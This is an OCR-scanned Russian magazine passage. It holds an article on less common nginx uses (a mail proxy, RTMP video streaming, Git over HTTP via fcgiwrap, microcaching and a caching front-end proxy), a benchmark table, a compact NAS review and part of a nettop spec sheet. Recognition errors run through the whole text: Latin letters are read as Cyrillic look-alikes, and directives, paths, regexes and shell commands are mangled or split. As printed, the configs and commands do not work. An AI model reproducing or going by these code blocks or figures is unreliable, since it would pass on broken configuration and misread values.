470 


75% 


511 


80% 


526 


90% 


616 


95% 


713 


98% 


871 


99% 


1020 


100% 


1022 



1022 (Іопдезі геаиезі) 



НТГН. ігапзіеггеР: 
редиезіз рег зесопсі: 
Тіте рег гедиезі: 

^іте рег гедиезі: 
Тгапзіег гаіе: 

Соппесііоп Тітез (тз) 



57263704 Ьуіез 
2364.75 [#/зес] (теап) 

211.439 [тзЗ (теап) 

0.423 [тз] (теап, асгозз а11 сопсиггепі гедиезіз) 
13780.60 [КЬуіез/зес] гесеіѵеЬ 





тіп 


теап[+/-з(]] 


тегііап 


тах 


|Соппесі : 


0 


127 567.2 


7 


3067 


ІРгосеззіпд: 


1 


60 68.3 


54 


767 


Наіііпд: 


1 


52 66.2 


46 


767 


'Тоіаі : 


2 


187 602.7 


61 


3705 


Регсепіаде оі 


іПе гедиезіз зегѵегі иіііЬіп а ( 



50% 


61 


66% 


73 


75% 


80 


80% 


84 


90% 


170 


95% 


230 


98% 


3100 


99% 


3313 


100% 


3705 (Іопдезі геоиезі) 



Замечательная особенность такого подхода в том, что его можно ис- 
пользовать вовсе не для самой аутентификации, а чтобы раскидать пользо- 
вателей по разным внутренним серверам, в зависимости от имени юзера, 
данных о текущих нагрузках на почтовые серверы либо вообще организовав 
простейшую балансировку нагрузки с помощью гоипР-гоЬіп. Впрочем, если 
требуется всего лишь перекинуть пользователей на внутренний почтовый 
сервер, можно использовать вместо реального скрипта заглушку, реализо- 
ванную самим пдіпх. Например, простейший 8МТР- и ІМАР-прокси в конфи- 
ге пдіпх будет выглядеть следующим образом: 

# ѵі /е-Ьс/п8Іпх/п§іпх.соп-Р 
таіі { 

# .Адрес. скрипта аутентификации _ 

аиСІі_ІтІ:1:р 1оса1Ііо5і::8080/аи1:Іі; _ 

# Отключаем команду XС^IЕNТ^ некоторые прнтрвые 

# серверы ее не понимают 

хсІіепТ о■р■Р^ 

. ..#...ІМАР-серРРР 

зегѵег { 

1І5І:еп 143; 

ргоТосоІ ітар; 

ргоху оп; ... 

#.5МТР- сервер 

зегѵег { 

ІізНеп 25; 

ргоііосоі зтСр; 

ргоху оп; _ 

Г - ----- 37 .. ; 

Далее в секцию Ыір конфига добавляем следующее: 

# ѵі /еТс/п§іпх/п§іпх.соітР 

Ы:1:р { 111.1.^ 

# Маппинг на нужный порт прчхрвр.гр.-Се^^ 

# в зависимости от порта^ отправленного в. заголовке 

# нттр_Аитн_Ркотосо 1 . 

тар. $Ь11:р_аиХІі_рго1:осо1 $таі1рог1; { 



Тестирование производительности с выключенным/включенным 
микрокешированием 



сІе-РаиІі: 25; 
зтТр 25; 
ітар 143; 

- - 



# .Р.е.а.Д.изация «с.кр.ипта^^^^^ - всегда 

.#. возвращает ОК и перекидывает пользователя 

на внутренний почтовый .сервер^ выс.т^^^ 

# . порт с. помощью приведенного выше .маппинга 

5егуег { _ _ 

ИзТеп 8080; 

ІосаТіоп /аиТИ { _ 

ас1с1_Ьеас1ег "АиТИ-БТаТиз" "ОК"; 

ас1с1_Ьеас1ег "АиТИ- Зегѵег" "192.168.0.1"; 

.. .асісІ^ЬеасІеГ- "АиТЬ-РогТ" $таі1рогі:; 

геТигп 200; 

} 

} 

} 

Это все. Такая конфигурация позволяет прозрачно перенаправлять поль- 
зователей на внутренний почтовый сервер, не создавая оверхеда в виде не- 
нужного в данном случае скрипта. Применив скрипт, такую конфигурацию 
можно существенно расширить: настроить балансировку нагрузки, прове- 
рять пользователей по базе ЕОАР и выполнять другие операции. Написание 
скрипта выходит за рамки этой статьи, однако его очень легко реализовать, 
даже имея лишь поверхностные знания о РНР и РуІІіоп. 

Зачем городить огород серверов, 
если на фронтенде уже установлен 
пдіпх для отдачи статики по НТТР? 



8УЫ/АСК 
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Іегѵег { 

# Висим на порту ѲѲѲѲ 
Изіеп 8080; 

# Одрес нашего сервера (не забудь добавить запись в 0Н5) 
зегѵег_пате діі.ехетріе.пеі; 

И Логи 

ассезз.іод /ѵаг/1од/пдіпх/дИ-бир-Ьаскепс1.ассезз. Іод; 
еггог_1од /ѵаг/Іод/пдіпх/діІ-бир-ЬаскепсІ.еггог . Іод; 

И ОсновноСі адрес для анонимного доступа 
Іосаііоп / { 

V При попытке загрузки отправляем юзера на приватный адрес 
ІТ ($агд_зегѵісе "діі-гесеіѵе-раск") { 
геыгііе /ргіѵа1е$игі Іазі; 

} 

і ПС 1 исіе /е1с/пд і пх/ ^азісд і _рагатз ; 

# Одрес нашего діі-ЫІр-ЬаскепсІ 

^азісді.рагат ЗСЙІРТ_РІІЕМ0№ /изг/ИЬ/діІ-соге/діі-иир-Ьаскепгі; 

# Одрес 0і 1-репозитория 

Разісді^рагат ВІТ_РК0ЛЕСТ_К00Т /згѵ/діі; 

Настраиваем СК-прокси 



ПОТОКОВОЕ ВЕЩАНИЕ ВИДЕО 

Поднять обычный видеохостинг на базе пдіпх легко. Достаточно только 
выложить перекодированное видео в доступный серверу каталог, пропи- 
сать его в конфиг и настроить флеш- или НТМЕ5-проигрыватель так, чтобы 
он брал видео из этого каталога. Однако, если требуется настроить непре- 
рывное вещание видео из какого-то внешнего источника или веб-камеры, 
такая схема не сработает, и придется смотреть в сторону специальных по- 
токовых протоколов. 

Есть несколько протоколов, решающих эту задачу, наиболее эффектив- 
ный и поддерживаемый из них РТМР. Беда только в том, что почти все ре- 
ализации РТМР-сервера страдают от проблем. Официальный АсІоЬе РІазИ 
Мебіа Зегѵег платный. Ресіб и ѴѴоѵѵга написаны на ^аѵа, а потому не дают 
нужной производительности, еще одна реализация, Егіуѵісіео, написана 
на Егіапд, что хорошо в случае настройки кластера, но не так эффективно 
для одиночного сервера. 

Я же предлагаю другой подход — воспользоваться модулем РТМР 
для пдіпх. Он обладает превосходной производительностью и к тому же по- 
зволит использовать один сервер для отдачи как веб-интерфейса сайта, так 
и видеопотока. 

Проблема в том, что модуль этот неофициальный, поэтому пдіпх с его 
поддержкой придется собрать самостоятельно. Благо сборка осуществляет- 
ся стандартным способом: 

$ зисіо ар-Іі-ее-І: гетоѵе п§іпх 

$ ссі /Ыр _ 

$ м^еі ІтІ:‘1:р://Ьі1:. 1у/ѴуК0іи -О п§іпх-г-^тр. 2 Ір 

$ ип 2 Ір п^іпх-г 1 :тр. 2 ір 

$ іл/ёеіЫ: 1 :р : //п§іпх. ог^/сІошІрасіУпёіпх- 1 . 2 . бЛаг .52 

$ Ііаг -хгР пяіпх-і .2. 6 . 1 ;аг .^2 

$ ССІ п§іпх-1.2.6 

$ ./сопб^иге --асІсІ-тосІи 1 е=/ 1 :тр/п§іпх-г 1 :тр-тосІи 1 е-та 5 І:ег 
$ таке 

$ зисіо таке іпз-ЬаІІ 

Теперь модуль нужно настроить. Делается это, как обычно, через конфиг 
пдіпх: 

гііпір { 

# Активируем сервер вещания, на порту .1935 

#..по. адресу саі^/гТтр 

зегѵег { 

ІізТеп 1935; 

аррІісаТіоп г 1 :тр { 

Ііѵе оп; * 

} 

} - 

} 

Модуль РТМР не умеет работать в многопоточной конфигурации, поэто- 
му количество рабочих процессов пдіпх придется сократить до одного (поз- 
же я расскажу, как обойти эту проблему): 

ілюгкег_ргосеззез 1 ; 



Теперь можно сохранить файл и заставить пдіпх перечитать конфигурацию. 
Настройка пдіпх завершена, но самого видеопотока у нас еще нет, поэтому 
его нужно где-то взять. Для примера пусть это будет файл ѵісіео.аѵі из текуще- 
го каталога. Чтобы превратить его в поток и завернуть в наш РТМР -вещатель, 
воспользуемся старым добрым РРтред: 

# -Р-Ртре§ -ге -і ~/ѵісІео.аѵі -с сору -Т Яѵ гТтр://-* 
1оса1Ііоз1:/г1:тр/з1:геат 

В том случае, если видеофайл представлен не в формате Н264, его сле- 
дует перекодировать. Это можно сделать на лету с помощью все того же 
РРтред: 

# Т-Ртре§ -ге -і ^/ѵісіео.аѵі -с:ѵ 1іЬх264 -с: а ІіЬТаас ^ 

-аг 44100 -ас 2 -Т Яѵ г1;тр://1оса111озТ/гТтр/зТгеат 

Поток также можно захватить прямо с веб-камеры: 

# -Р-Ртре§ -Т ѵісІео41іпих2 -і /сіеѵ/ѵі(іео0 -с.:у. 1іЬх264 

-ап --Р Яѵ г1:тр://1оса1Ііоз1:/г1:тр/з1:геат 

Чтобы просмотреть поток на клиентской стороне, можно воспользовать- 
ся любым проигрывателем с поддержкой РТМР, например тріауег: 

$ тріауег гт-1;р://ехатр1е.сот/г1:тр/з1:геат 

Или встроить проигрыватель прямо в веб-страницу, которая отдается 
тем же пдіпх (пример из официальной документации). Простейший веб- 
проигрыватель РТМР: 

<зсгірТ 1уре="1:ехі/заѵа5сгірі" 5гс=’7зѵ»/р1ауег/змр1ауег.зз"> 
</зсгірТ> 

<зсгір1; Туре="Техі:/заѵазсгірТ"> 

ЗіАір1ауег("соп1;аіпег") .5е1:ир({ 

тосіез: [ 

{ Туре: "ЯазЬ"л 

зге: ’7лмр1ауег/р1ауег,зѵ^^^ 

сопЯ§: { 

Ьи-РТегІеп^ТЬ : 1, 

Яіе: "зТгеат", 

зТгеатег: "гТтр://1оса1ІіРзТ/гТтр"^ 
ргоѵісіег: "гТтр"^ 

} 

} 

I 

}); 

</зсгір1:> 

Важных строк тут всего две: «ЯІе: "зігеат"», указывающая на РТМР- 
поток, и «зігеатег: "г1тр://ІосаІІіо8ѴПтр"», в которой указан адрес РТМР- 
стримера. Для большинства задач таких настроек будет вполне достаточно. 
По одному адресу можно пустить несколько разных потоков, а пдіпх будет 
эффективно их мультиплексировать между клиентами. Но это далеко не все, 
на что способен РТМР-модуль. С его помощью, например, можно организо- 
вать ретрансляцию видеопотока с другого сервера. Сервер РРтред для это- 
го вообще не нужен, достаточно добавить следующие строки в конфиг: 

# ѵі /е 1 :с/п 2 Іпх/п 8 Іпх.согѵР 
арріісаііоп гітр 

Ііѵе оп; 

риіі г1;тр://гі:тр.ехатр1е.сот; 

Если требуется создать несколько потоков в разном качестве, можно вы- 
звать перекодировщик РРтред прямо из пдіпх: 

# ѵі /е-Ьс/п§іпх/п§іпх.соітР 

арр1ісаі:іоп гітр { 

Ііѵе оп; 

ехес -Р-Ртре§ - і гітр : //1оса1Ііоз1:/г1:тр/$пате <-• 

,-с:у Яѵ -с:а -5 320x240 --Р Яѵ гі:тр://1оса1Мо5і:/«-' 

г1;тр-320х240/$пате; 

} 

арр1іса1:іоп г-ітр- 320x240 { 

Ііѵе оп; 

} — 
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С помощью такой конфигурации мы получим сразу два вещателя, один 
из которых будет доступен по адресу Птр://сайт/Птр, а второй, вещающий 
в качестве 320 х 240, — по адресу Птр://сайт/г1тр-320х240. Далее на сайт 
можно повесить флеш-плеер и кнопки выбора качества, которые будут под- 
совывать плееру тот или иной адрес вещателя. 

Ну и напоследок пример вещания музыки в сеть: 

\^/Иі1е ■1:гие; сіо 

■Р-Ртре§ -ге -і ”'^пс1 /ѵаг/тизіс -1:уре -Р -пате ^ 

’*.трЗ' І50ГІ -К I ИеасІ -п 1' " -уп_ -с:а ІіЬ-Раас 

-аг 44100 ас 2 --Р Ріѵ г1;тр://1оса1Ьо5-Ь/г1:тр/5І:геат; 

сіопе 



СІТ-ПРОКСИ 

Система контроля версий Оіі способна обеспечивать доступ к репозитори- 
ям не только по протоколам (Зіі и 88Н, но и по НТТР. Когда-то реализация 
доступа по НТТР была примитивной и неспособной обеспечить полноцен- 
ную работу с репозиторием. С версии 1 .6.6 ситуация изменилась, и сегодня 
этот протокол можно использовать, чтобы, например, обойти ограничения 
брандмауэров как с той, так и с другой стороны соединения либо для созда- 
ния собственного Сіі-хостинга с веб-интерфейсом. 

К сожалению, официальная документация рассказывает только об ор- 
ганизации доступа к Оіі средствами веб-сервера АрасИе, но, так как сама 
реализация представляет собой внешнее приложение со стандартным СОІ- 
интерфейсом, ее можно прикрутить практически к любому другому серверу, 
включая ІідИирсІ и, конечно же, пдіпх. Для этого не потребуется ничего, кроме 
самого сервера, установленного Сіі и небольшого РазЮОІ-сервера Ьдіѵѵгар, 
который нужен, потому что пдіпх не умеет работать с СОІ напрямую, но умеет 
вызывать скрипты с помощью протокола РазЮОІ. 

Вся схема работы будет выглядеть следующим образом. Сервер Тсдіѵѵгар 
будет висеть в фоне и ждать запроса на исполнение ССІ-приложения. 
Мдіпх, в свою очередь, будет сконфигурирован на запрос исполнения ССІ- 
бинарника діЫійр-ЬаскепсІ через РазЮСІ-интерфейс каждый раз при обра- 
щении к указанному нами адресу. Получив запрос, Тсдіѵѵгар исполняет ді^ 
И«р-Ьаскепс1 с указанными ССІ-аргументами, переданными Сіі-клиентом, 
и возвращает результат. 

Чтобы реализовать такую схему, сначала установим Тсдіѵѵгар: 

$ зисіо ар-Ь-^еІ іпзііаіі -Рсбімгар 

Настраивать его не нужно, все параметры передаются по протоколу 
РазЮОІ. Запущен он будет тоже автоматически. Поэтому остается только на- 
строить пдіпх. Для этого создаем файл /еІс/пдіпх/зіІез-епаЫесІ/діІ (если тако- 
го каталога нет, можно писать в основной конфиг) и пишем в него следующее: 

# ѵі /еІс/пеіпх/зі-Ьез-епаЫесІ/бі-к 

зегѵег { 

# Висим, на .порту 8080 

Изііеп 8080; 

# Адрес нашего сервера. Хне, _з.а6уАь_ з^апись 

#..в. 

зегѵег_пате еіс.ехатріе.ги; 

# Логи 

ассезз^іое /ѵаг/1ое/пёіпх/еі1:-Ь1:1;р-ЬаскепсІ.ассе55.1о§; 

еггог__1о§ /ѵаг/1об/п§іпх/5І1-И1:1:р-ЬаскепсІ . еггог . 1о§; 

# Основно.й . адрес, для .анонимного доступа 

Іосаіііоп / { 

. # При попытке . з.а грузки, .отпр.авляем 

.#-.н.а..пр.и.ватный адрес 

-і'Р_($аг^_5егуісе "§і1:-гесеіѵе-раск") { 

ге»л/гі1:е /ргіѵа1:е$игі ІазС; 

} 

іпсіисіе /е1:с/п§іпх/-Ра5-1:с§і_рагат5; 



#..Адрес. нашего 8І1=-Ьі:1р-ЬаскепсІ 

•Раз1:сёі__рагат 5СКІРТ_РІІЕЫАМЕ /изг/1іЬ/ёі1:-соге/- 
- Іі1:1:р - Ьас кепсі ; 

# Адрес. СІ1 -репозитория 
■Раз-Ьсбі^рагат СІТ_РР01ЕСТ_К00Т /згѵ/еі-І:; 

# Адрес файла 

■Раз1:сеі_рагат РАТН_ІМР0 $игі; 

# Адрес , сервера . -рсбі^^га р 

■Ра5І:с§і__ра55 127.0.0.1:9001; _ _ 

} 

# Адре.с.^аля. .доступа , на запись 

Іосаіііоп ~/ргіѵа1:е(/. *)$ { 



# Полномочия .юзер.а 

ац1:Іі_Ьа5Іс "еІ'Ь апопутоиз геасі-опіу, 4-^ 
аи1:Иеп1:іса1:есІ мгіСе"; 

# . .НТ.ТР-.аутент.ифика.ция. ..на. основе 
аиі;Іі_Ьазіс_изег_іі1е /е1:с/п§іпх/ІтІ:разз»л/сІ; 



.#... На с трои к и РазІССІ 

іпсіцсіе /е1;с/п§іпх/-Раз‘1:сёі_рагатз; 

■РазСс§і_рагат 5СКІРТ_РІІЕЫАМЕ /изг/1іЬ/§іС-соге/^ 
§І1:-Іт1:1:р- Ьас кепсі; 

■Раз1:с§і__рапат СІТ__Р803ЕСТ_К00Т /згѵ/ёіі:; 

■Раз-1:с2І_рагат РАТН_ІМРО $1; 

■Раз1:с§і_разз 127.0.0.1:9001; 

} 

} 

Этот конфиг предполагает три важные вещи: 

1 . Адресом репозитория будет /згѵ/діі, поэтому выставляем соответствую- 
щие права доступа: 

$ зисіо сЬоѵу/п -К ѵллг\л/-сІа1:а :ммм-с1а'Ьа /вгѵ/ёі^ 

2. Сам репозиторий должен быть открыт на чтение анонимусами и позво- 
лять аплоад по НТТР: 

$ ссі /згѵ/§і-1; __ 

$ еіі: С 0 ПІІ& соге.вЬагесІгерозіІіогу Тгие 
$ &ІТ СОпЛе НТТр.гесеіѵераск Тгие 

3. Аутентификация осуществляется с помощью файла Ыраззѵѵсі, нужно его 
создать и добавить в него пользователей: 

$ зисіо арТ-^еТ іпз.ТаІІ арасЬе2-иТі1з 

$ ЬТраззшсІ -с /еТс/п§іпх/ЬТраззіл/сі изегі 

$ ЬТраззмсІ /еТс/пё^іпх/ЬТраззіусІ изег2 



На этом все, перезагружаем пдіпх: 

$ зисіо зегуісе ПЕіпх гезТагТ 

Далее можно подключиться к репозиторию с помощью клиента ОіТ 

МИКРОКЕШИРОВАНИЕ 

Представим себе ситуацию с динамичным, часто обновляемым сайтом, ко- 
торый вдруг начинает получать очень большие нагрузки (ну попал он на стра- 
ницу одного из крупнейших новостных сайтов) и перестает справляться с от- 
дачей контента. Грамотная оптимизация и реализация правильной схемы 
кеширования займет долгое время, а проблемы нужно решать уже сейчас. 
Что мы можем сделать? 

Есть несколько способов выйти из этой ситуации с наименьшими по- 
терями, однако наиболее интересную идею предложил сренн Бэйли (Репп 
Ваііеу, ^еппЬ.сот ). Идея в том, чтобы просто поставить перед сервером пдіпх 
и заставить его кешировать весь передаваемый контент, но не просто кеши- 
ровать, а всего на одну секунду. Изюминка здесь в том, что сотни и тысячи 
посетителей сайта в секунду, по сути, будут генерировать всего одно об- 
ращение к бэкенду, получая в большинстве своем кешированную страницу. 
При этом разницу вряд ли кто-то заметит, потому что даже на динамичном 
сайте одна секунда обычно ничего не значит. 

Конфиг с реализацией этой идеи будет выглядеть не так уж и сложно: 

# ѵі /еіс/пбіпх/зііез-епаЫеа/сасИе-ргоху 
#. Настройка кеша 

ргоxу_сасI^е^эа1:I^ /ѵаг/сасііе/пеіпх 1еѵе1з=1:2 
кеуз_20пе=тісгосасЬе:5т тах_зІ2е=1000т; 
зегѵег { 

Когда-то реализация доступа 
по НТТР была примитивной 
и неспособной обеспечить полноцен- 
ную работу с репозиторием 



8УЫ/АСК 
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1і5-1:еп 80; 

5егѵег_пате ехатріе.сот; 

# Кешируемый адрес _ 

Іоса-Ьіоп / { 

# Кеш включен по умолчанию 
5е1: $по_сасЬе 

# Отключаем кеш для . всех 

# и . НЕДР 

($геяие5і^_те1^ІіосІ !- /^(СЕТ|НЕА0)$) { 

5е1; $по_сасИе "1”; 

} 



# В случае если клиент загружает контент на сайт.. 

..# ..(.п.о_^са.сЬе = чтобы отдаваемые 

# ему данные не кешировались в течение двух 

# с. екхНА-.И он смог увидеть резул ьтат з а груз к и 

і-р ($по_сасІіе = "1") .{. 

асІсІ^ЬеасІеп 5е1;-Соокіе "_тспс=1; Мах-А§е=2; ♦"« 

Раі:Н=/"; 

асІсІ_ІіеасІег Х-МісгосасЬаЫе "0"; 

} — ~ 

і-Р ($Ы:1:р_сооІ<іе "_тспс") { 

5е1; $по_сасІіе "1"; 

> 




# ВключаемУотключаем кеш .В. .зависимости 

.#...О.т .С.остояния переменной по_сасбе 

ргоху_по_сасИе $по_сасІіе; 

ргоху__сасЬе_Ьура55 $по_сасЬе; 



# .Пр.оксируем запросы на реальный сервер 

ргоху_ра55 Ы:1:р : //аррзегѵег . ехатріе . ги; 

ргоху_сасЬе тісгосасЬе; 

ргоху_сасЬе_кеу $5сЬете$Ио5І;$*-‘ 

гедие5І:_те1:Иосі$гедие5І:_игі : 

ргоху_сасЬе_ѵа1ісІ 200 І5; 



# Зашита от проблемы ТЬипсІегіпЕ ЬегсІ 
ргрху_сасІіе_и5е_5-1:а1е ирсІа1;іп§; 



Добавляем. .станАартные...х^ 

ргоху_5е1:_ЬеаДег Ноз-Ь $Ио5-Ь ; 
р го ху _5 е1:_Іі е а сі е г X - К е а 1 - 1 Р $ г етоі; е__а сі сі т ; 

ргоху_5е1:_ИеасІег Х-РогыагсІесІ-Рог 

$ргоху_ас1с|__х_-Рогыагс1ес1_-Рог; 



# Не кешируем файлы размером больше 1 Мб 
р гоху_та х_1: етр_Рі 1 е_5 і 2 е 1М ; 

} I . 

Особое место в этом конфиге занимает строка «ргоху_сасІіе_и8е_8ІаІе 
ирбаііпд;», без которой мы бы получили периодические всплески нагруз- 
ки на бэкенд-сервер из-за запросов, пришедших во время обновления 
кеша. В остальном все стандартно и должно быть понятно без лишних 
объяснений. 

ПРИБЛИЖЕНИЕ ПРОКСИ К ЦА 

Несмотря на повсеместное глобальное увеличение скоростей интернета, 
физическая удаленность сервера от целевой аудитории все равно продол- 
жает играть свою роль. Это значит, что, если русский сайт крутится на сер- 
вере, расположенном где-нибудь в Америке, скорость доступа к нему бу- 
дет априори ниже, чем с российского сервера с такой же шириной канала 
(естественно, если закрыть глаза на все остальные факторы). Другое дело, 
что размещать серверы за рубежом зачастую выгоднее, в том числе и в пла- 
не обслуживания. Поэтому для получения профита, в виде более высоких 
скоростей отдачи, придется идти на хитрость. 



в январском отчете компании ЫеЩгаІІ пдіпх вырвался на второе место 



Один из возможных вариантов: разместить основной производительный 
сервер на Западе, а не слишком требовательный к ресурсам фронтенд, от- 
дающий статику, развернуть на территории России. Это позволит без се- 
рьезных затрат выиграть в скорости. Конфиг пдіпх для фронтенда в этом слу- 
чае будет простой и всем нам знакомой реализацией прокси: 

# ѵі /е-Ьс/п8Іпх/5І-Ье5-епаЫесІ/ргоху 

# Храним кеш 30 дней в 100- гигабайтном .хранилище 

ргоху_сасИе_ра-^б /ѵаг/сасііе/пбіпх 1еуеІ5=1:2 

кеу5_20пе=5І:а-1:іс :32т іпас-1:іуе=30сІ тах_5І2е=100ё; 

Бегѵег { 

1і5І:еп 80; 

_ 5егѵег_пате ехатріе.сот; 

_.#...Ср6.ственно^ н 

Іосаіііоп Х.СзрбІЗрееІеі-РІрпёІісоІсззІтісІііыаѵІ— 
Ьтр|з5І5Ы-РІЯѵ|аѵі|сІзѵи|трЗ)$ { 

# Адрес бэкенда 

ргоху_ра55 Ьаск. ехатріе.сот: 80; 

ргоху^гесЦгесЬ о-Р-Рз 

ргоху_5е1:_ІіеасІег Н05І: $Ьо5І:; 

ргрху_5е1_Ііеас1ег Х-Кеаі-і $гетр-Се_аРс1г; 

ргоху_5е1:_ЬеасІег X- РргыагсІеР - 

$ргоху_ас1с1_х_-Рогыагс1ес1_-Рог; 

ргоху_Ьи-Р-Рег_5І2е 16к; 

ргоху_Ьи-р-Рег5 32 Ібк; 

ргоху_сасИе вСа-Сіс; 

ргоху_сасЬе_ѵа1ісІ 30сІ; 

ргоху_1ёпоге_ЬеаРеп5 ''СасЬе-СопСго!"^ "Ехрігез"; 
ргоху_сасЬе_кеу "$игі$І5_агб5$аг25"; 
ргоху сасИе Іоск оп; 

} 

} 

ВЫВОДЫ 

Сегодня с помощью пдіпх можно решить множество самых разных задач, мно- 
гие из которых вообще не связаны с сервером и протоколом НТТР. Почтовый 
прокси, потоковое вещание и интерфейс Оіі — это только часть таких задач. □□ 



Физическая удаленность сервера от аудитории по-прежнему важна. Если рус- 
ский сайт крутится на сервере, расположенном в Америке, скорость доступа 
к нему будет априори ниже, чем с российского сервера с такой же шириной 
канала (естественно, если закрыть глаза на все остальные факторы) 
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КРОХА-СЕРВЕР 




виррАьо 
иыкзтАтіоы 



Процессор: МагѵеІІ 88Р6281, 600 МГц 
Оперативная память: 00Р2, 128 Мб 
Количество дисков: 2 х 2,5" 

Интерфейс: 8АТА 

Емкость каждого из дисков: 500 Гб, 1 Тб 
Поддерживаемые массивы ПАЮ: 

о, 1, ^во^ 

Поддерживаемые сетевые протоколы: 
8МВ/СІР5, РТР, АРР 
Энергопотребление: 17 Вт 
Габариты: 40 х 82 х 135 мм 
Вес: 0,5 кг 

РЕЗУЛЬТАТЫ 

ТЕСТИРОВАНИЯ 

ІМТЕІНА8РТНАІ00 



НОѴіс1ео_1РІау: 26,3 Мб/с 

НОѴі<1ео_2РІау: 26,9 Мб/с 

НОѴІ(Іео_4РІау: 26,4 Мб/с 

НОѴі(1ео_1 Песогсі: 20,7 Мб/с 

НОѴі(1ео_1 Р1ау_1 Ресогсі: 26,2 Мб/с 

СопІепІСгеаІіоп: 8,2 Мб/с 

О^ПсеРгобисПѵЙу: 15,9 Мб/с 

РіІеСоруТоНАЗ: 16,2 Мб/с 

РііеСоруРготЫаз: 23,5 Мб/с 

ОігесІогуСоруТоНАЗ: 6 Мб/с 

ОігесІогуСоруРготИАЗ: 3,4 Мб/с 

РЬоІоАІЬит: 10,3 Мб/с 



РЕЗУЛЬТАТЫ 

ТЕСТИРОВАНИЯ 

ІНТЕІНА8РТВАІ01 



НОѴіаео_1РІау: 17,3 Мб/с 

НОѴіс1ео_2РІау: 12,3 Мб/с 

Н0Ѵі(1ео_4РІау: 16,4 Мб/с 

НОѴі(1ео_1Несога: 14,2 Мб/с 

НОѴі(1ео_1 Р1ау_1 Весогсі: 19,2 Мб/с 

СопІепІСгеаІіоп: 1,8 Мб/с 

ОІІісеРгосІисІІѵіІу: 14,9 Мб/с 

РіІеСоруТоИАЗ: 9,0 Мб/с 

РіІеСоруРготМаз: 14,3 Мб/с 

ОігесІогуСоруТоИАЗ: 4 Мб/с 

ОігесІогуСоруРготНАЗ: 3,9 Мб/с 

РИоІоАІЬит: 11 Мб/с 



К оличество сетевых накопителей уже просто 
зашкаливает, и выбирать между ними ста- 
новится все сложнее. И если раньше можно 
было четко и достаточно быстро опереться 
на производительность или наличие тех или иных функ- 
ций устройства, то теперь границы функциональности 
МАЗ’ов практически стерты. На первый план выходит 
удобство работы и, как это ни странно, внешний вид 
устройства. 

Сетевой накопитель Ви^аіо ЫпкЗІаІіоп Міпі действи- 
тельно очень компактный. Жесткие диски форм-фактора 
2.5" позволили сделать устройство поистине миниа- 
тюрным — оно спокойно помещается на среднего раз- 
мера ладонь. При этом в корпусе разместились сразу 
два жестких диска. Сам корпус выполнен из пластика. 
И среди ЫпкЗіаІіоп Міпі ты можешь выбрать хранилище, 
выполненное как в черном цвете, так и в белом. Также 
МАЗ’ы данной линейки могут различаться в емкости вин- 
честеров: 500 Гб или 1000 Пб каждый. В итоге мы полу- 
чаем четыре разные модификации накопителя. Как гово- 
рится, на любой вкус. 

В тестовую лабораторию попало хранилище черного 
цвета с двумя дисками по 500 Пб. Из интерфейсов на кор- 
пусе были обнаружены: ІІЗВ 2.0 и ЕШегпе^разъем. 
На верхнем торце выведена кнопка «Рипс^іоп», а сзади 
трехпозиционный выключатель с положениями ОТТ, Оп 
и АиТо. Примечательно, что крайнее положение «рубиль- 
ника» позволяет устройству в режиме бездействия спо- 
койно «засыпать», экономя тем самым электроэнергию. 

Что касается самого накопителя, то прощивка оста- 
ется практически неизменной от модели к модели. Тем 
не менее стоит обратить внимание на массу приятных 
мелочей и особенностей. Так, пара жестких дисков мо- 
жет работать в режиме иВОО, РАЮ 0 или РАЮ 1 . Сервер 
позволяет настроить отправку системных сообщений 
на электронную почту, и тогда информация о смене ста- 



туса устройства будет приходить прямо на указанный 
электронный ящик. Еще одна особенность накопителей 
Ви^аіо — самостоятельно заменить диски невозможно. 
Неважно, вышел ли диск из строя, или хочется нарастить 
емкость, — в таком случае придется обращаться в сер- 
висный центр компании. 

Что касается сетевых возможностей, то тут при- 
сутствуют службы для сетевого доступа из всех попу- 
лярных ОС. Кроме того, есть сервер ОЕМА, основанный 
на популярном софте ТѵѵопкуМесІіа. Настроек довольно 
много, а добраться к интерфейсу можно по ІР сервера: 
9050. Приятно, что столь малое устройство умеет рабо- 
тать с торрентами, — масса контента распространяется 
именно так. Кроме того, накопитель может выступать 
в качестве интернет-сервера, ведь в нем есть поддерж- 
ка РНР и МуЗОЕ-баз. То есть ты можешь создать сайт, 
который поместится буквально в кармане. Стоит пом- 
нить, что процессор ЕіпкЗІаІіоп Міпі не слишком мощный 
и на обработку контента или больших запросов у него уй- 
дет масса времени, но для сайта-визитки или же выдачи 
файлов хранилище сгодится. 

ВЫВОДЫ 

Сетевой накопитель ВиТТаІо ЕіпкЗіаІіоп Міпі интересен 
прежде всего своими габаритами. И дело даже не в мак- 
симальной емкости дисков, которая может составлять 
до 2 Тб, а в компактном и бесщумном корпусе. Благода- 
ря пассивной системе охлаждения этот накопитель ни- 
чем не потревожит в любое время суток. Надо понимать, 
что при серьезных нагрузках и одновременном доступе 
нескольких пользователей МАЗ начнет испытывать про- 
блемы. Однако он и не предназначен для такого исполь- 
зования. Но в качестве домащнего варианта с возможно- 
стью удаленного доступа ЕіпкЗІаііоп Міпі представляется 
нам хорошим вариантом. На наш взгляд, это хранилище 
отлично подойдет для владельцев ноутбуков, з: 
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ЕЕЕВОХ 



УТОНЧЕННЫЙ 

МЫСЛИТЕЛЬ 



ЕВ1033 




ТЕХНИЧЕСКИЕ 

ХАРАКТЕРИСТИКИ 

Процессор: ІШеІ Аіот 02550, 1866 
МГц, 1 Мб Оперативная память: 

1 2 Гб, ООРЗ 1600 МГц Видеокар- 

та: NVI^IА ОеРогсе 610М, 512 Мб 
Накопитель: 1 х НОО, 320 Гб, 
Зеадаіе Мотепіиз Тіііп 8Т3201Т020- 
9УС142 Блок питания: А81І8 
АОР-653Н ВВ, 65 Вт Интерфейсы: 
4 х08В 2.0,2x086 3.0,1 х нОМІ, 

1 X 0-8иЬ, 2 X Аибіо Заек , 1 х рз-45 
(10/100/1000 Мбит/с) Беспровод- 
ная связь: \Ѵі-Рі 802.11 Ь/д/п 
Дополнительно: картридер (ММС, 
80, 80НС, 80ХС), Кепзіпдіоп Іоск 
Размеры: 219 х 172,5 х 29 мм 
Вес: 690 г 



РЕЗУЛЬТАТЫ 
ТЕСТИРОВАНИЯ 

Общий тест: 

РСМагк 7: 

ѴѴеЬ Ьгоѵѵзіпд: 

РСМагк 7: 

Техі егііііпд; 

РСМагк 7: 

8узіет зіогаде/зіапіпд 
арріісаііопз; 

РСМагк 7; 

Ѵібео рІауЬаск: 

Производительность 
процессора: 
х264 НО Вепебтагк 4.0: 

(раззі) 17,89 РР8 

(ра$8 2) 3,31 РР8 

Производительность 
при работе в интернете: 

Сапѵаз Регіотапсе Іезі: 105 РР8 

Реасекеерег: 403 балла 

